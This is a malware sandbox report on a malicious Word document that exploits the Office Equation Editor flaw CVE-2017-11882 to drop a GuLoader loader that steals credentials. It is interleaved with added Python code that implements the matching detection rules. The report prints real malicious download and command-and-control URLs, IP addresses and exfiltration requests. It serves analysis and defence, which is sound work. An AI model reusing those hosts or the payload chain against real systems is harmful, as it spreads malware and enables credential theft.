
Analysis Report Shipping documents .doc

Overview

General Information

Sample Name: Shipping documents .doc
Analysis ID: 289457
MD5: c6e349221350923e221ecd8cb7a853fa
SHA1: 8eac38325a53f7009c9db4e37c692e148b025151
SHA256: 14eb827b600c3f7ccf2af766d0fec868e6b0467eba9264f19b75427f95ef7cfa
Tags: doc

Detection

GuLoader
Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected GuLoader
Binary contains a suspicious time stamp
Contains functionality to hide a thread from the debugger
Hides threads from debuggers
Office equation editor drops PE file
Office equation editor starts processes (likely CVE-2017-11882 or CVE-2018-0802)
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file access)
Yara detected VB6 Downloader Generic
Adds / modifies Windows certificates
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Drops PE files
Drops certificate files (DER)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Office Equation Editor has been started
PE file does not import any functions
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries information about the installed CPU (vendor, model number etc)
Searches for user specific document files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Startup

  • System is w7x64
  • WINWORD.EXE (PID: 1960 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)
  • EQNEDT32.EXE (PID: 2396 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • jketxzi.exe (PID: 2328 cmdline: C:\Users\user\AppData\Roaming\jketxzi.exe MD5: F8B85F347A71A59F7F00AE7532F2C18B)
      • jketxzi.exe (PID: 1916 cmdline: C:\Users\user\AppData\Roaming\jketxzi.exe MD5: F8B85F347A71A59F7F00AE7532F2C18B)
  • EQNEDT32.EXE (PID: 2444 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
Process Memory Space: jketxzi.exe PID: 2328 | JoeSecurity_VB6DownloaderGeneric | Yara detected VB6 Downloader Generic | Joe Security | -
Process Memory Space: jketxzi.exe PID: 2328 | JoeSecurity_GuLoader | Yara detected GuLoader | Joe Security | -

Sigma Overview

System Summary:

Sigma detected: Droppers Exploiting CVE-2017-11882
Source: Process started | Author: Florian Roth | Data: Command: C:\Users\user\AppData\Roaming\jketxzi.exe, CommandLine: C:\Users\user\AppData\Roaming\jketxzi.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\jketxzi.exe, NewProcessName: C:\Users\user\AppData\Roaming\jketxzi.exe, OriginalFileName: C:\Users\user\AppData\Roaming\jketxzi.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2396, ProcessCommandLine: C:\Users\user\AppData\Roaming\jketxzi.exe, ProcessId: 2328
Sigma detected: EQNEDT32.EXE connecting to internet
Source: Network Connection | Author: Joe Security | Data: DestinationIp: 54.36.244.168, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2396, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49167
Sigma detected: File Dropped By EQNEDT32EXE
Source: File created | Author: Joe Security | Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2396, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\linkdo[1].exe

      Signature Overview


AV Detection:

Antivirus / Scanner detection for submitted sample
Source: Shipping documents .doc | Avira: detected
Antivirus detection for URL or domain
Source: http://www.radio80.eu/wp-content/plugins/louder/linkdo.exe | Avira URL Cloud: Label: malware
Multi AV Scanner detection for domain / URL
Source: officestore.co.id | Virustotal: Detection: 8%
Source: http://officestore.co.id/linkzer/PL341/index.php | Virustotal: Detection: 10%
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\linkdo[1].exe | Virustotal: Detection: 40%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\linkdo[1].exe | ReversingLabs: Detection: 25%
Multi AV Scanner detection for submitted file
Source: Shipping documents .doc | Virustotal: Detection: 37%
Source: Shipping documents .doc | ReversingLabs: Detection: 37%

Exploits:

Office equation editor starts processes (likely CVE-2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\user\AppData\Roaming\jketxzi.exe
Source: unknown | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: unknown | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: global traffic | DNS query: name: www.radio80.eu
Source: global traffic | TCP traffic: 192.168.2.22:49168 -> 54.36.244.168:443
Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 54.36.244.168:80
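The three Sigma hits in this report, the process tree in the Startup section and the Exploits evidence above all reduce to the same host-side question: did EQNEDT32.EXE spawn a child, open a network connection, or write an executable? The following is an added example (not Joe Sandbox's or the Sigma project's code) that implements those three rules over Sysmon-shaped events. Field names follow the match data printed in the Sigma Overview; the sample events are constructed from the report's process tree and are not a real log, and the PE-extension filter in the file-drop rule is this example's own choice.

```python
"""Detection logic for the three EQNEDT32.EXE Sigma rules that fired in this
report, run over constructed Sysmon-shaped events (example code, not Joe
Sandbox's or Sigma's own implementation)."""
from typing import Callable, Dict, List, Tuple

EQNEDT = "eqnedt32.exe"


def _basename(path: str) -> str:
    """Sysmon Image/ParentImage are full paths; match on the file name only."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def rule_eqnedt_spawns_child(ev: dict) -> bool:
    """Droppers Exploiting CVE-2017-11882: a process-creation event (EventID 1)
    whose parent is the Equation Editor.  Rendering an equation never needs a
    child process, so any child is a strong signal."""
    return ev.get("EventID") == 1 and _basename(ev.get("ParentImage", "")) == EQNEDT


def rule_eqnedt_network(ev: dict) -> bool:
    """EQNEDT32.EXE connecting to internet: an outbound connection (EventID 3)
    initiated by the Equation Editor itself."""
    return (ev.get("EventID") == 3
            and ev.get("Initiated") is True
            and _basename(ev.get("Image", "")) == EQNEDT)


def rule_eqnedt_drops_file(ev: dict) -> bool:
    """File Dropped By EQNEDT32EXE: a file-create event (EventID 11) by the
    Equation Editor.  Limiting it to PE extensions is this example's own
    assumption to cut noise; the report's rule may be broader."""
    target = ev.get("TargetFilename", "").lower()
    return (ev.get("EventID") == 11
            and _basename(ev.get("Image", "")) == EQNEDT
            and target.endswith((".exe", ".dll", ".scr")))


RULES: Dict[str, Callable[[dict], bool]] = {
    "Droppers Exploiting CVE-2017-11882": rule_eqnedt_spawns_child,
    "EQNEDT32.EXE connecting to internet": rule_eqnedt_network,
    "File Dropped By EQNEDT32EXE": rule_eqnedt_drops_file,
}


def evaluate(events: List[dict]) -> List[Tuple[str, int]]:
    """Return (rule name, ProcessId) for every event that matches a rule."""
    return [(name, ev.get("ProcessId"))
            for ev in events
            for name, rule in RULES.items()
            if rule(ev)]


EQ = r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"
WORD = r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE"
DROPPER = r"C:\Users\user\AppData\Roaming\jketxzi.exe"

# Constructed events mirroring the report's process tree and Sigma match data.
SAMPLE_EVENTS = [
    # Equation Editor activated via COM; the report records no parent for it.
    {"EventID": 1, "Image": EQ, "CommandLine": f"'{EQ}' -Embedding", "ProcessId": 2396},
    # Word writing its own scratch file: benign, must not fire.
    {"EventID": 11, "Image": WORD, "ProcessId": 1960,
     "TargetFilename": r"C:\Users\user\AppData\Local\Temp\CVRBE10.tmp"},
    {"EventID": 3, "Image": EQ, "ProcessId": 2396, "Initiated": True, "Protocol": "tcp",
     "DestinationIp": "54.36.244.168", "DestinationPort": 80},
    {"EventID": 11, "Image": EQ, "ProcessId": 2396,
     "TargetFilename": r"C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\linkdo[1].exe"},
    {"EventID": 11, "Image": EQ, "ProcessId": 2396, "TargetFilename": DROPPER},
    {"EventID": 1, "Image": DROPPER, "ParentImage": EQ, "ParentProcessId": 2396, "ProcessId": 2328},
    # Second-stage self-spawn: parent is the dropper, not EQNEDT32, so no hit here.
    {"EventID": 1, "Image": DROPPER, "ParentImage": DROPPER, "ParentProcessId": 2328, "ProcessId": 1916},
]

if __name__ == "__main__":
    for name, pid in evaluate(SAMPLE_EVENTS):
        print(f"{name}: PID {pid}")
```

Matching on the parent image rather than the child's name is what makes the first rule survive renamed payloads; the dropper's own self-spawn (PID 2328 to 1916) is deliberately out of scope for it and is caught by the injection signatures further down instead.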

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2021697 ET TROJAN EXE Download Request To Wordpress Folder Likely Malicious 192.168.2.22:49167 -> 54.36.244.168:80
Source: Traffic | Snort IDS: 2029405 ET TROJAN Win32/AZORult V3.3 Client Checkin M2 192.168.2.22:49173 -> 103.247.10.55:80
Source: Traffic | Snort IDS: 2029136 ET TROJAN AZORult v3.3 Server Response M1 103.247.10.55:80 -> 192.168.2.22:49173
Source: Joe Sandbox View | IP Address: 103.247.10.55
Source: Joe Sandbox View | ASN Name: OVHFR
Source: Joe Sandbox View | ASN Name: RUMAHWEB-AS-IDRumahwebIndonesiaCVID
Source: Joe Sandbox View | JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
Source: global traffic | HTTP traffic detected: GET /wp-content/plugins/louder/linkdo.exe HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: www.radio80.eu | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /linkzer/PL341/index.php HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1) | Host: officestore.co.id | Content-Length: 103 | Cache-Control: no-cache | Data Raw: 00 00 00 26 66 96 42 11 8b 30 64 8b 30 62 ec 26 66 99 40 70 9c 47 70 9d 30 70 9d 37 70 9d 30 14 8b 30 67 eb 40 70 9d 35 70 9c 47 16 8b 30 65 8b 30 63 8b 30 65 8b 30 67 ed 41 70 9d 36 70 9c 47 70 9d 30 70 9d 3a 10 ef 26 66 9b 26 66 9f 26 66 9d 26 66 9d 26 67 ea 26 66 9c 47 13 8b 30 61 ec 45 70 9d 33 70 9d 35 | Data Ascii: &fB0d0b&f@pGp0p7p00g@p5pG0e0c0e0gAp6pGp0p:&f&f&f&f&g&fG0aEp3p5
Source: global traffic | HTTP traffic detected: POST /linkzer/PL341/index.php HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1) | Host: officestore.co.id | Content-Length: 41707 | Cache-Control: no-cache
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{9B09FC7D-537D-406E-B057-1B1541B1D39D}.tmp
Source: jketxzi.exe, 00000004.00000002.2087940759.0000000003150000.00000002.00000001.sdmp | String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: unknown | DNS traffic detected: queries for: www.radio80.eu
Source: E0F5C59F9FA661F6F4C50B87FEF3A15A.2.dr | String found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c
Source: mozglue.dll.5.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: mozglue.dll.5.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: mozglue.dll.5.dr | String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: mozglue.dll.5.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: mozglue.dll.5.dr | String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: mozglue.dll.5.dr | String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: mozglue.dll.5.dr | String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
Source: 77EC63BDA74BD0D0E0426DC8F8008506.2.dr | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: jketxzi.exe, 00000004.00000002.2087940759.0000000003150000.00000002.00000001.sdmp | String found in binary or memory: http://investor.msn.com
Source: jketxzi.exe, 00000004.00000002.2087940759.0000000003150000.00000002.00000001.sdmp | String found in binary or memory: http://investor.msn.com/
Source: jketxzi.exe, 00000004.00000002.2088084586.0000000003337000.00000002.00000001.sdmp | String found in binary or memory: http://localizability/practices/XML.asp
Source: jketxzi.exe, 00000004.00000002.2088084586.0000000003337000.00000002.00000001.sdmp | String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: mozglue.dll.5.dr | String found in binary or memory: http://ocsp.digicert.com0C
Source: mozglue.dll.5.dr | String found in binary or memory: http://ocsp.digicert.com0N
Source: mozglue.dll.5.dr | String found in binary or memory: http://ocsp.thawte.com0
Source: jketxzi.exe, 00000004.00000002.2088084586.0000000003337000.00000002.00000001.sdmp | String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: mozglue.dll.5.dr | String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: mozglue.dll.5.dr | String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: mozglue.dll.5.dr | String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: jketxzi.exe, 00000004.00000002.2088084586.0000000003337000.00000002.00000001.sdmp | String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: jketxzi.exe, 00000004.00000002.2087940759.0000000003150000.00000002.00000001.sdmp | String found in binary or memory: http://www.hotmail.com/oe
Source: jketxzi.exe, 00000004.00000002.2088084586.0000000003337000.00000002.00000001.sdmp | String found in binary or memory: http://www.icra.org/vocabulary/.
Source: mozglue.dll.5.dr | String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: mozglue.dll.5.dr | String found in binary or memory: http://www.mozilla.com0
Source: jketxzi.exe, 00000004.00000002.2087940759.0000000003150000.00000002.00000001.sdmp | String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: jketxzi.exe, 00000004.00000002.2087940759.0000000003150000.00000002.00000001.sdmp | String found in binary or memory: http://www.windows.com/pctv.
Source: mozglue.dll.5.dr | String found in binary or memory: https://www.digicert.com/CPS0
Source: 48349708493818193655002.tmp.5.dr | String found in binary or memory: https://www.google.com/search?q=test&oq=test&aqs=chrome..69i57j0j46j0l2j46j0j5.485j0j8&sourceid=chro
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49168
Source: unknown | Network traffic detected: HTTP traffic on port 49168 -> 443
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0F5C59F9FA661F6F4C50B87FEF3A15A
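The two Snort hits above come from request-level traits that are visible in the captured HTTP traffic: a .exe fetched from a WordPress plugin folder (2021697) and a binary POST to index.php with a stale MSIE 6.0b User-Agent (2029405). The following is an added example (not the Emerging Threats rules themselves) that parses raw HTTP requests and flags both patterns. Its conditions are this example's approximation of what the captured requests show, not the ET rule logic; the sample requests are constructed from the traffic lines above, with the POST body truncated to its first 14 bytes and two benign controls added.

```python
"""Heuristics over raw HTTP requests for the two traffic findings in this
report (example code, not Emerging Threats' rules; conditions are an
approximation of the visible request traits)."""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Tuple


@dataclass
class HttpRequest:
    method: str
    path: str
    headers: Dict[str, str] = field(default_factory=dict)
    body: bytes = b""


def parse_request(raw: bytes) -> HttpRequest:
    """Minimal HTTP/1.1 request parser: request line, headers, raw body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return HttpRequest(method, path, headers, body)


WP_EXE = re.compile(r"/wp-content/.*\.exe(?:\?|$)", re.IGNORECASE)
STALE_UA = "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)"


def exe_from_wordpress_folder(req: HttpRequest) -> bool:
    """GET of a .exe under /wp-content/: compromised plugin folders are a
    common staging location, as with the radio80.eu download above."""
    return req.method == "GET" and WP_EXE.search(req.path) is not None


def azorult_like_checkin(req: HttpRequest) -> bool:
    """POST carrying the stale MSIE 6.0b / NT 5.1 User-Agent, no Content-Type,
    and a body beginning with three zero bytes, as in the captured check-in.
    This is an assumption modelled on the capture, not the ET signature."""
    return (req.method == "POST"
            and req.headers.get("user-agent") == STALE_UA
            and "content-type" not in req.headers
            and req.body.startswith(b"\x00\x00\x00"))


CHECKS = {
    "exe download from wp-content": exe_from_wordpress_folder,
    "azorult-like check-in": azorult_like_checkin,
}


def scan(raw_requests: List[bytes]) -> List[Tuple[str, str]]:
    """Return (label, path) for every request matching a check."""
    hits = []
    for raw in raw_requests:
        req = parse_request(raw)
        hits.extend((label, req.path) for label, check in CHECKS.items() if check(req))
    return hits


# Constructed samples: the first two mirror the report's captured requests
# (POST body truncated to its first 14 bytes); the last two are benign controls.
_BODY = bytes.fromhex("00000026669642118b30648b3062")
SAMPLE_REQUESTS = [
    (b"GET /wp-content/plugins/louder/linkdo.exe HTTP/1.1\r\nAccept: */*\r\n"
     b"Accept-Encoding: gzip, deflate\r\n"
     b"User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0)\r\n"
     b"Host: www.radio80.eu\r\nConnection: Keep-Alive\r\n\r\n"),
    (b"POST /linkzer/PL341/index.php HTTP/1.1\r\nUser-Agent: " + STALE_UA.encode()
     + b"\r\nHost: officestore.co.id\r\nContent-Length: " + str(len(_BODY)).encode()
     + b"\r\nCache-Control: no-cache\r\n\r\n" + _BODY),
    b"GET /wp-content/plugins/louder/style.css HTTP/1.1\r\nHost: www.radio80.eu\r\n\r\n",
    (b"POST /index.php HTTP/1.1\r\nUser-Agent: Mozilla/5.0\r\nHost: example.invalid\r\n"
     b"Content-Type: application/json\r\nContent-Length: 2\r\n\r\n{}"),
]

if __name__ == "__main__":
    for label, path in scan(SAMPLE_REQUESTS):
        print(f"{label}: {path}")
```

The User-Agent alone is a weak indicator (legacy software still sends it), which is why the check-in heuristic also requires the missing Content-Type and the binary body prefix; for production use, pair it with the destination IOCs listed above rather than deploying it on its own.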

System Summary:

Office equation editor drops PE file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Roaming\jketxzi.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\linkdo[1].exe
Source: C:\Users\user\AppData\Roaming\jketxzi.exe | Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\jketxzi.exe | Memory allocated: 76D20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\jketxzi.exe | Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\jketxzi.exe | Memory allocated: 76D20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\jketxzi.exe | Code function: 4_2_002D3B36 NtResumeThread
Source: C:\Users\user\AppData\Roaming\jketxzi.exe | Code function: 4_2_002D1554 NtWriteVirtualMemory
Source: C:\Users\user\AppData\Roaming\jketxzi.exe | Code function: 4_2_002D3782 NtProtectVirtualMemory
Source: C:\Users\user\AppData\Roaming\jketxzi.exe | Code function: 4_2_002D1709 NtWriteVirtualMemory
Source: C:\Users\user\AppData\Roaming\jketxzi.exe | Code function: 4_2_002D026C NtSetInformationThread,CloseServiceHandle,TerminateProcess
Source: C:\Users\user\AppData\Roaming\jketxzi.exe | Code function: 4_2_002D3B4A NtResumeThread
Source: C:\Users\user\AppData\Roaming\jketxzi.exe | Code function: 4_2_002D3A51 NtProtectVirtualMemory
Source: C:\Users\user\AppData\Roaming\jketxzi.exe | Code function: 4_2_002D0950 NtWriteVirtualMemory
Source: C:\Users\user\AppData\Roaming\jketxzi.exe | Code function: 4_2_002D3753 NtProtectVirtualMemory
Source: C:\Users\user\AppData\Roaming\jketxzi.exe | Code function: 4_2_002D3BA4 NtResumeThread
Source: C:\Users\user\AppData\Roaming\jketxzi.exe | Code function: 4_2_002D3CB6 NtResumeThread
Source: C:\Users\user\AppData\Roaming\jketxzi.exe | Code function: 4_2_002D20B1 NtWriteVirtualMemory
Source: C:\Users\user\AppData\Roaming\jketxzi.exe | Code function: 4_2_002D15B0 NtWriteVirtualMemory
Source: C:\Users\user\AppData\Roaming\jketxzi.exe | Code function: 4_2_002D1295 NtWriteVirtualMemory
Source: C:\Users\user\AppData\Roaming\jketxzi.exe | Code function: 4_2_002D10DB NtSetInformationThread,CloseServiceHandle,TerminateProcess
Source: api-ms-win-core-errorhandling-l1-1-0.dll.5.dr | Static PE information: No import functions for PE file found
Source: api-ms-win-core-debug-l1-1-0.dll.5.dr | Static PE information: No import functions for PE file found
Source: api-ms-win-core-datetime-l1-1-0.dll.5.dr | Static PE information: No import functions for PE file found
Source: api-ms-win-core-console-l1-1-0.dll.5.dr | Static PE information: No import functions for PE file found
Source: jketxzi.exe, 00000004.00000002.2087940759.0000000003150000.00000002.00000001.sdmp | Binary or memory string: .VBPud<_
Source: classification engine | Classification label: mal100.phis.troj.spyw.expl.evad.winDOC@7/66@4/2
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\Desktop\~$ipping documents .doc
Source: C:\Users\user\AppData\Roaming\jketxzi.exe | Mutant created: \Sessions\1\BaseNamedObjects\A8AD17B7C-343A2EC6-C0602CB5-39EA5133-2DF4BF06
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Temp\CVRBE10.tmp
Source: C:\Users\user\AppData\Roaming\jketxzi.exe | Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File read: C:\Users\desktop.ini
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File read: C:\Windows\System32\drivers\etc\hosts (4 times)
Source: C:\Users\user\AppData\Roaming\jketxzi.exe | File read: C:\Windows\System32\drivers\etc\hosts (3 times)
Source: softokn3.dll.5.dr | Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: softokn3.dll.5.dr | Binary or memory string: SELECT ALL %s FROM %s WHERE id=$ID;
Source: nss3.dll.5.dr | Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: softokn3.dll.5.dr | Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: nss3.dll.5.dr | Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: nss3.dll.5.dr | Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: softokn3.dll.5.dr | Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: nss3.dll.5.dr | Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3.dll.5.dr | Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3.dll.5.dr | Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3.dll.5.dr | Binary or memory string: SELECT ALL id FROM %s;
Source: softokn3.dll.5.dr | Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: softokn3.dll.5.dr | Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: nss3.dll.5.dr | Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: nss3.dll.5.dr | Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: nss3.dll.5.dr | Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: nss3.dll.5.dr | Binary or memory string: CREATE TABLE xx( name TEXT, /* Name of table or index */ path TEXT, /* Path to page from root */ pageno INTEGER, /* Page number */ pagetype TEXT, /* 'internal', 'leaf' or 'overflow' */ ncell INTEGER, /* Cells on page (0 for overflow) */ payload INTEGER, /* Bytes of payload on this page */ unused INTEGER, /* Bytes of unused space on this page */ mx_payload INTEGER, /* Largest payload size of all cells */ pgoffset INTEGER, /* Offset of page in file */ pgsize INTEGER, /* Size of the page */ schema TEXT HIDDEN /* Database schema being analyzed */);
Source: nss3.dll.5.dr | Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3.dll.5.dr | Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknown | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: unknown | Process created: C:\Users\user\AppData\Roaming\jketxzi.exe C:\Users\user\AppData\Roaming\jketxzi.exe
Source: unknown | Process created: C:\Users\user\AppData\Roaming\jketxzi.exe C:\Users\user\AppData\Roaming\jketxzi.exe
Source: unknown | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\user\AppData\Roaming\jketxzi.exe C:\Users\user\AppData\Roaming\jketxzi.exe
Source: C:\Users\user\AppData\Roaming\jketxzi.exe | Process created: C:\Users\user\AppData\Roaming\jketxzi.exe C:\Users\user\AppData\Roaming\jketxzi.exe
Source: C:\Users\user\AppData\Roaming\jketxzi.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{DCB00C01-570F-4A9B-8D69-199FDBA5723B}\InProcServer32
Source: Window Recorder | Window detected: More than 3 window changes detected
